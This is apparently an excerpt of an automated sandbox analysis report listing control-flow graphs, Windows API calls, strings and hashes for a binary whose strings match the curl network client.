                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: malloc$ErrorLastfreereallocrecv
                                        • String ID: SSL: public key does not match pinned public key$schannel: %s$schannel: SNI or certificate check failed: %s$schannel: failed to receive handshake, SSL/TLS connection failed$schannel: failed to send next handshake data: sent %zd of %lu bytes$schannel: next InitializeSecurityContext failed: %s$schannel: unable to allocate memory$schannel: unable to re-allocate memory
                                        • API String ID: 3337821324-3713536417
                                        • Opcode ID: d707bd1520a484b200e2fb384ad9460b346a1c717c26a43c7955e29e075eddc9
                                        • Instruction ID: 50da8501f45488b7a18594f1fb5bcae927b1a82881cada51b7fce64fd25a22c2
                                        • Opcode Fuzzy Hash: d707bd1520a484b200e2fb384ad9460b346a1c717c26a43c7955e29e075eddc9
                                        • Instruction Fuzzy Hash: A5F15DB0A006159FDB28DF18CD85BE9B7B5BF48310F1081EAE54DA7295DBB09E81CF91

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1228 efd8c-efdf2 call 113040 1231 efe3d-efe3f 1228->1231 1232 efdf4-efe04 1228->1232 1233 efef4-eff18 1231->1233 1234 efe45-efe53 1231->1234 1235 efe1b-efe26 call d2119 1232->1235 1236 efe06-efe18 call d2119 1232->1236 1239 eff1b-eff1d 1233->1239 1234->1233 1238 efe59 1234->1238 1242 efe2b-efe3c 1235->1242 1236->1235 1243 efe5b-efe5d 1238->1243 1244 efe63-efe83 call 113040 1238->1244 1245 effd5-efff0 1239->1245 1246 eff23-eff31 1239->1246 1242->1231 1243->1233 1243->1244 1258 efec5-efed7 1244->1258 1259 efe85 1244->1259 1247 efff6-f0002 1245->1247 1246->1245 1249 eff37 1246->1249 1250 f000d-f0013 1247->1250 1251 f0004-f0007 1247->1251 1253 eff39-eff3b 1249->1253 1254 eff41-eff64 call 113040 1249->1254 1257 f0015-f0017 1250->1257 1256 f0009-f000b 1251->1256 1251->1257 1253->1245 1253->1254 1266 effa9-effb8 1254->1266 1267 eff66 1254->1267 1256->1250 1256->1257 1261 f002b-f003c 1257->1261 1262 f0019 1257->1262 1263 efeb3-efeb9 1258->1263 1264 efe8f-efea2 call 113040 1259->1264 1265 efe87-efe8d 1259->1265 1270 f0042-f006f call ce2dd * 3 1261->1270 1268 f001f-f0029 1262->1268 1269 f001b-f001d 1262->1269 1263->1239 1278 efea8-efeb0 call 113040 1264->1278 1265->1264 1271 efebb-efebd 1265->1271 1266->1247 1273 eff68-eff6e 1267->1273 1274 eff70-eff83 call 113040 1267->1274 1268->1270 1269->1261 1269->1268 1301 f007f-f0085 1270->1301 1302 f0071-f007d 1270->1302 1271->1258 1275 efebf 1271->1275 1273->1274 1279 eff9f-effa1 1273->1279 1291 eff89-eff9d call 113040 1274->1291 1281 efed9-efef2 call 1131d0 1275->1281 1282 efec1-efec3 1275->1282 1278->1263 1279->1266 1287 effa3 1279->1287 1281->1278 1282->1258 1282->1281 1293 effba-effd3 call 1131d0 1287->1293 1294 effa5-effa7 1287->1294 1291->1247 1293->1291 1294->1266 1294->1293 1303 f008b-f008d 1301->1303 1302->1303 1304 f008f-f00b0 1303->1304 1305 f00b2-f00c0 1303->1305 1306 f00c3-f00de 1304->1306 1305->1306 1307 f0125-f0131 1306->1307 1308 f00e0 1306->1308 1309 f0137-f01ed call ce127 * 6 call d2119 1307->1309 1310 f00ea-f00fa call 113040 1308->1310 1311 f00e2-f00e8 1308->1311 1336 f01f2-f0210 fflush call 110ca6 1309->1336 1321 f00fd-f0108 call 113040 1310->1321 1311->1310 1313 f010a-f010c 1311->1313 1313->1307 1315 f010e 1313->1315 1318 f0114-f0123 call 1131d0 1315->1318 1319 f0110-f0112 1315->1319 1318->1321 1319->1307 1319->1318 1321->1309
                                        APIs
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000EFDDF
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000EFE73
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000EFE95
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000EFEA8
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000EFF51
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000EFF76
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000EFF89
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000F00F0
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000F00FD
                                        • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 000F01FB
                                        Strings
                                        • %% Total %% Received %% Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed, xrefs: 000EFE1B
                                        • ** Resuming transfer from byte position %I64d, xrefs: 000EFE08
                                        • %3I64d %s %3I64d %s %3I64d %s %s %s %s %s %s %s, xrefs: 000F01E2
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$fflush
                                        • String ID: %3I64d %s %3I64d %s %3I64d %s %s %s %s %s %s %s$ %% Total %% Received %% Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed$** Resuming transfer from byte position %I64d
                                        • API String ID: 1893817590-664487449
                                        • Opcode ID: f8240bb303d796f92dc6237ba57dbcc3982d0637ddee94010e7258eddd48bff8
                                        • Instruction ID: 90dbcde16bb3e611eb075a506c92923daf69d0c1e143f92d348fa4a24153e963
                                        • Opcode Fuzzy Hash: f8240bb303d796f92dc6237ba57dbcc3982d0637ddee94010e7258eddd48bff8
                                        • Instruction Fuzzy Hash: 19D14571E04749AEEB648B65CC81BEEB7B9FF48300F10416DEA5EA3252DB3539819F10

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1540 d760d-d764e 1541 d794f-d7951 1540->1541 1542 d7654-d765a 1540->1542 1543 d7952-d7960 call 110ca6 1541->1543 1542->1541 1544 d7660-d7666 1542->1544 1546 d7668 1544->1546 1547 d7670-d7675 1544->1547 1551 d766a-d766b 1546->1551 1548 d76e7-d76fc call d91a5 1547->1548 1549 d7677-d7689 call d752d 1547->1549 1556 d770e-d7714 1548->1556 1557 d76fe-d7708 1548->1557 1558 d768b-d769b 1549->1558 1551->1543 1559 d7716-d7733 malloc 1556->1559 1560 d7743-d774b 1556->1560 1557->1556 1561 d769d-d76a2 1558->1561 1562 d76af-d76b9 1558->1562 1575 d773c 1559->1575 1576 d7735-d7737 1559->1576 1566 d7866-d7886 WSAWaitForMultipleEvents 1560->1566 1567 d7751-d775c 1560->1567 1561->1562 1563 d76a4-d76a9 1561->1563 1564 d76bb-d76c0 1562->1564 1565 d76c5-d76cc 1562->1565 1563->1562 1564->1565 1569 d76c2-d76c3 1564->1569 1571 d76ce-d76d2 1565->1571 1572 d76d4-d76df 1565->1572 1573 d788c-d788f 1566->1573 1574 d791f-d7932 WSAResetEvent 1566->1574 1567->1566 1570 d7762-d7772 call d752d 1567->1570 1569->1571 1585 d7774-d778d 1570->1585 1571->1558 1571->1572 1572->1549 1580 d76e1 1572->1580 1581 d7915-d791d 1573->1581 1578 d794b-d794d 1574->1578 1579 d7934-d794a free 1574->1579 1575->1560 1576->1551 1578->1543 1579->1578 1580->1548 1581->1574 1582 d78bb-d78c7 call d752d 1581->1582 1591 d78c9-d78d8 1582->1591 1588 d778f-d7796 1585->1588 1589 d77b8 1585->1589 1588->1589 1592 d7798-d77b6 1588->1592 1590 d77be-d77cc 1589->1590 1593 d77ce-d77d5 1590->1593 1594 d780a-d780d 1590->1594 1595 d790c-d7912 1591->1595 1596 d78da-d790a WSAEnumNetworkEvents WSAEventSelect 1591->1596 1592->1590 1593->1594 1597 d77d7-d7808 send 1593->1597 1598 d780f-d7824 WSAEventSelect 1594->1598 1599 d7836-d7847 1594->1599 1595->1581 1596->1591 1596->1595 1597->1598 1600 d7894-d789b 1598->1600 1601 d7826-d7830 1598->1601 1599->1570 1602 d784d-d784f 1599->1602 1604 d789d-d78b3 free 1600->1604 1605 d78b4 1600->1605 1601->1585 1601->1599 1602->1566 1603 d7851-d785b call ef35e 1602->1603 1608 d7860-d7864 1603->1608 1604->1605 1605->1582 1608->1566 1608->1573
                                        APIs
                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000D7728
                                        • send.WS2_32(?,00000000,00000000,00000000), ref: 000D77EA
                                        • WSAEventSelect.WS2_32(?,?,00000000), ref: 000D781C
                                        • WSAWaitForMultipleEvents.WS2_32(00000001,000000DC,00000000,000003E8,00000000,00000000,00000000,00000000), ref: 000D7879
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000D78B1
                                        • WSAEnumNetworkEvents.WS2_32(?,00000000,00000000), ref: 000D78EE
                                        • WSAEventSelect.WS2_32(?,?,00000000), ref: 000D7900
                                        • WSAResetEvent.WS2_32(?), ref: 000D7925
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000D7948
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: Event$EventsSelectfree$EnumMultipleNetworkResetWaitmallocsend
                                        • String ID: 2
                                        • API String ID: 760094153-450215437
                                        • Opcode ID: b59e69d2ac2b9ae45660e99ba1f85a8cc0ca99ac12e77f580130a7fa0b85f327
                                        • Instruction ID: de1945d691934cf1426da63a283d8eb44a81d3c2e1863ced45f1d8eb7198dc3d
                                        • Opcode Fuzzy Hash: b59e69d2ac2b9ae45660e99ba1f85a8cc0ca99ac12e77f580130a7fa0b85f327
                                        • Instruction Fuzzy Hash: E9A1C130A047299FDB648F64CC84BADB7B6EF45310F1082AAD55EA7391EB309D85CF61

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1609 dee55-deeb6 call df472 1612 deebc-deedc call de407 1609->1612 1613 df1ab-df1b9 call 110ca6 1609->1613 1618 deede-def14 _errno * 2 call da0b8 call dd6ad 1612->1618 1619 def19-def38 call dd632 1612->1619 1631 df045-df05b call df3fc 1618->1631 1625 def3a-def41 1619->1625 1626 def43-def4a 1619->1626 1625->1626 1628 def6d-def73 1625->1628 1626->1628 1629 def4c-def60 1626->1629 1630 def7a-def88 call dedc5 1628->1630 1629->1630 1632 def62-def66 call ded5e 1629->1632 1639 def9c-defa3 1630->1639 1640 def8a-def91 1630->1640 1631->1613 1637 def6b 1632->1637 1637->1630 1642 defa5-defd8 call d9622 * 2 1639->1642 1643 defe7-defee 1639->1643 1640->1639 1641 def93-def97 call ddcb0 1640->1641 1641->1639 1673 defda 1642->1673 1674 df037-df039 1642->1674 1644 deff9-df015 call ddedf 1643->1644 1645 deff0-deff7 1643->1645 1648 df060-df0a8 ioctlsocket call f480b 1644->1648 1654 df017-df032 call df3fc 1644->1654 1645->1644 1645->1648 1656 df0d9-df0e0 1648->1656 1657 df0aa-df0d6 call d941d * 2 1648->1657 1654->1613 1660 df196-df1a9 1656->1660 1661 df0e6-df0ea 1656->1661 1657->1656 1660->1613 1661->1660 1666 df0f0-df0fd 1661->1666 1669 df0ff-df116 connect 1666->1669 1670 df128-df139 WSAGetLastError 1666->1670 1669->1670 1676 df118-df120 1669->1676 1671 df13b-df141 1670->1671 1672 df185 1670->1672 1671->1672 1677 df143-df146 1671->1677 1679 df187-df194 1672->1679 1678 defe1 1673->1678 1674->1678 1680 df03b 1674->1680 1676->1613 1681 df126 1676->1681 1677->1672 1682 df148-df183 call da0b8 call dd632 call df3fc 1677->1682 1678->1643 1679->1613 1680->1631 1681->1679 1682->1613
                                        APIs
                                          • Part of subcall function 000DE407: htons.WS2_32(?), ref: 000DE43C
                                        • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?), ref: 000DEEDE
                                        • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000DEEE6
                                          • Part of subcall function 000DA0B8: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000DA0C3
                                          • Part of subcall function 000DA0B8: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000DA0CB
                                          • Part of subcall function 000DA0B8: __sys_nerr.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000DA0DD
                                          • Part of subcall function 000DA0B8: __sys_errlist.API-MS-WIN-CRT-RUNTIME-L1-1-0(000000FF), ref: 000DA0EC
                                          • Part of subcall function 000DA0B8: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 000DA0F6
                                          • Part of subcall function 000DA0B8: _strrchr.LIBCMT ref: 000DA142
                                          • Part of subcall function 000DA0B8: _strrchr.LIBCMT ref: 000DA15C
                                          • Part of subcall function 000DA0B8: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000DA173
                                          • Part of subcall function 000DA0B8: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000DA180
                                          • Part of subcall function 000DA0B8: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000DA188
                                          • Part of subcall function 000DA0B8: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 000DA193
                                          • Part of subcall function 000DF3FC: closesocket.WS2_32(000E1EF4), ref: 000DF433
                                        Strings
                                        • *, xrefs: 000DF03B
                                        • Immediate connect fail for %s: %s, xrefs: 000DF15C
                                        • sa_addr inet_ntop() failed with errno %d: %s, xrefs: 000DEF00
                                        • Trying %s:%d..., xrefs: 000DEF23
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: _errno$ErrorLast$_strrchr$__sys_errlist__sys_nerrclosesockethtonsstrncpy
                                        • String ID: Trying %s:%d...$*$Immediate connect fail for %s: %s$sa_addr inet_ntop() failed with errno %d: %s
                                        • API String ID: 1577232418-1840382996
                                        • Opcode ID: c32f0ab33a99ca6571cfff78e02c5172254ea0d98711811e611c274949a7d731
                                        • Instruction ID: 61ccd07e7aa304147f8fbb516dc50003ce0323e982e8270aab79aee35c3c9082
                                        • Opcode Fuzzy Hash: c32f0ab33a99ca6571cfff78e02c5172254ea0d98711811e611c274949a7d731
                                        • Instruction Fuzzy Hash: 50919231A003599BDF65AB24DC44BED77B6AF49314F1440FBE80AA7392DB319E848F60
                                        Strings
                                        • No connections available., xrefs: 000E5B5B
                                        • host, xrefs: 000E5AA1
                                        • No connections available in cache, xrefs: 000E5C70
                                        • NTLM-proxy picked AND auth done set, clear picked, xrefs: 000E5C0F
                                        • proxy, xrefs: 000E5AA7, 000E5AAF
                                        • Re-using existing connection #%ld with %s %s, xrefs: 000E5AB3
                                        • No more connections allowed to host: %zu, xrefs: 000E5B4D
                                        • NTLM picked AND auth done set, clear picked, xrefs: 000E5BE3
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: calloc$free
                                        • String ID: NTLM picked AND auth done set, clear picked$NTLM-proxy picked AND auth done set, clear picked$No connections available in cache$No connections available.$No more connections allowed to host: %zu$Re-using existing connection #%ld with %s %s$host$proxy
                                        • API String ID: 171065143-538710404
                                        • Opcode ID: 369d0a72a70ded07a5b4419d07ad2bb8f7986c48ea071c1c8bc1367bfd18693f
                                        • Instruction ID: de423435dd57b4aca8f5bf2d00c8a145bf64dbac28a2622ecef7851623c640ff
                                        • Opcode Fuzzy Hash: 369d0a72a70ded07a5b4419d07ad2bb8f7986c48ea071c1c8bc1367bfd18693f
                                        • Instruction Fuzzy Hash: 8022B770B04E819FDB59DF39C8947E9B7E1BF48315F08466AE818AB342DB70AC15CB91
                                        Strings
                                        • After %I64dms connect time, move on!, xrefs: 000DE98C
                                        • connect to %s port %u failed: %s, xrefs: 000DEAB2
                                        • L', xrefs: 000DE99A
                                        • Failed to connect to %s port %u after %I64d ms: %s, xrefs: 000DED2B
                                        • Connection timeout after %ld ms, xrefs: 000DEC51
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: After %I64dms connect time, move on!$Connection timeout after %ld ms$Failed to connect to %s port %u after %I64d ms: %s$L'$connect to %s port %u failed: %s
                                        • API String ID: 0-861291074
                                        • Opcode ID: ebbd31ebaf8341fb1a88fba3e6d2b140b51e5c0cea63a1285aa6372cf2a41f36
                                        • Instruction ID: 90bc6ae3cb87f1d7f6515b757354a3d6d508fb66f7e2868927268e68f77f76bb
                                        • Opcode Fuzzy Hash: ebbd31ebaf8341fb1a88fba3e6d2b140b51e5c0cea63a1285aa6372cf2a41f36
                                        • Instruction Fuzzy Hash: FBE1D5319007949BDF65EE28CC457EA73B6AF85324F1401EAEC096F392DB719D818FA1
                                        APIs
                                          • Part of subcall function 000FFEA6: getaddrinfo.WS2_32(?,?,?,?), ref: 000FFEC0
                                          • Part of subcall function 000FFEA6: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?), ref: 000FFF44
                                        • WSAGetLastError.WS2_32 ref: 000E8A68
                                        • WSAGetLastError.WS2_32 ref: 000E8A72
                                        • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?), ref: 000E8A87
                                        • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?), ref: 000E8A95
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E8AB1
                                        • send.WS2_32(000000FF,?,00000001,00000000), ref: 000E8ACC
                                        • WSAGetLastError.WS2_32 ref: 000E8AD6
                                        • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?), ref: 000E8AE4
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: CriticalErrorLastSection$Leave$Enterfreegetaddrinfomallocsend
                                        • String ID:
                                        • API String ID: 2368937457-0
                                        • Opcode ID: b74b68ed492899e78cd215727890411493fc483de6a92d183778b2a87f485084
                                        • Instruction ID: 9e713d823357ffc56a5e6e55fae426effacc83fe30f59451dd40631f3a85e702
                                        • Opcode Fuzzy Hash: b74b68ed492899e78cd215727890411493fc483de6a92d183778b2a87f485084
                                        • Instruction Fuzzy Hash: CF219E75600704DFD7249FA5DD44AABBBF9FF88700B04893EE856D36A1DA31A845CBA0
                                        APIs
                                        • GetModuleHandleA.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(ntdll,wine_get_version), ref: 0010463C
                                        • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000), ref: 00104643
                                        Strings
                                        • wine_get_version, xrefs: 00104632
                                        • Failed to set SNI, xrefs: 001047E5
                                        • ntdll, xrefs: 00104637
                                        • schannel: Windows version is old and may not be able to connect to some servers due to lack of SNI, algorithms, etc., xrefs: 0010461C
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: AddressHandleModuleProc
                                        • String ID: Failed to set SNI$ntdll$schannel: Windows version is old and may not be able to connect to some servers due to lack of SNI, algorithms, etc.$wine_get_version
                                        • API String ID: 1646373207-3067498429
                                        • Opcode ID: 46a3f17fd38102b81009c17a02f391e649ba578ec9109ec1a69ae979af599344
                                        • Instruction ID: fb299650896f196aadd0af2685ad8e105c11a57217c7c16c2780a4008aac6cfb
                                        • Opcode Fuzzy Hash: 46a3f17fd38102b81009c17a02f391e649ba578ec9109ec1a69ae979af599344
                                        • Instruction Fuzzy Hash: 206192B0A04340DFDB398F249C85BF573B5AF86325F1402B9E9959E2D2E7B18D85CB11
                                        APIs
                                          • Part of subcall function 000D2677: realloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,000E7EE5,?,?,?,000E8727,?,?,00000000,?,?,?,000E8849,00000000,?,?), ref: 000D26C4
                                          • Part of subcall function 000D2677: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,000E8849,00000000,?,?,?,000D2373,?,?,?,?,000C16C6,?,00200030), ref: 000D26DF
                                        • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 000CCC1D
                                          • Part of subcall function 000D2920: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,000C9117,?,?,?,00000000,Failed to create/open output), ref: 000D2935
                                          • Part of subcall function 000D2677: GetEnvironmentVariableA.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,00000000,00000001,?,?,?,000E8727,?,?,00000000,?,?,?,000E8849,00000000,?), ref: 000D2698
                                        • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 000CCC5D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: _strdupfree$EnvironmentVariablerealloc
                                        • String ID: CURL_CA_BUNDLE$SSL_CERT_DIR$SSL_CERT_FILE$out of memory
                                        • API String ID: 8184070-1311070097
                                        • Opcode ID: 0903d08e73c382cc61124d390ae1cb62667a61f50b38a4e9cdf000c07c237cb4
                                        • Instruction ID: 29ea0bb1db05bbe0325f766ee2a2030ddb8a1410abb47110e5d7681194f4ae4b
                                        • Opcode Fuzzy Hash: 0903d08e73c382cc61124d390ae1cb62667a61f50b38a4e9cdf000c07c237cb4
                                        • Instruction Fuzzy Hash: B931DB71A04352AFDB16ABB4D8A1FEDB7E0AF15310F15016EE84CA7352EB748E40C791
                                        APIs
                                        • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 000CCE46
                                        • setlocale.API-MS-WIN-CRT-LOCALE-L1-1-0(00000000,001174AB,?,00000000,?,?,?,000C901E,?), ref: 000CCE59
                                        • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00120780,00000002), ref: 000CCE75
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 000CCEC0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: _strdupfreesetlocalestrncmp
                                        • String ID: --disable$z
                                        • API String ID: 792593065-3267513583
                                        • Opcode ID: c550094d53491ff43de1540826fec1e26acb3abb7f8756e277f83fd50786689e
                                        • Instruction ID: bc13901735e5b014768e3999b7a2ac4b96b1f03b868487248df91269be2451af
                                        • Opcode Fuzzy Hash: c550094d53491ff43de1540826fec1e26acb3abb7f8756e277f83fd50786689e
                                        • Instruction Fuzzy Hash: 4E21DA31700611DBEBB4A754D996FFD22D19B46760F24443EF90AD6592DF70DC819281
                                        APIs
                                        • getsockname.WS2_32(?,?,?), ref: 000DE5C6
                                        • WSAGetLastError.WS2_32(?,?,?), ref: 000DE5D0
                                          • Part of subcall function 000DA0B8: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000DA0C3
                                          • Part of subcall function 000DA0B8: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000DA0CB
                                          • Part of subcall function 000DA0B8: __sys_nerr.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000DA0DD
                                          • Part of subcall function 000DA0B8: __sys_errlist.API-MS-WIN-CRT-RUNTIME-L1-1-0(000000FF), ref: 000DA0EC
                                          • Part of subcall function 000DA0B8: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 000DA0F6
                                          • Part of subcall function 000DA0B8: _strrchr.LIBCMT ref: 000DA142
                                          • Part of subcall function 000DA0B8: _strrchr.LIBCMT ref: 000DA15C
                                          • Part of subcall function 000DA0B8: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000DA173
                                          • Part of subcall function 000DA0B8: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000DA180
